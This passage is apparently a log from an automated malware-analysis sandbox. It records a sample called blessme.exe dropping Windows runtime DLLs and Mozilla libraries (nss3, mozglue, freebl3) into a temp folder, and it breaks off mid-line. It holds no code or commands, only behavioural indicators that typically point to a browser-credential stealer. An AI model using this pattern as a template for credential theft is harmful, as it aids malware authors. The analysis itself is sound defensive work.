            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-filesystem-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\nss3.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\vcruntime140.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-interlocked-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\msvcp140.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-stdio-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\mozglue.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-util-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-private-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-convert-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\ucrtbase.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-timezone-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\freebl3.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-sysinfo-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exe, File created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local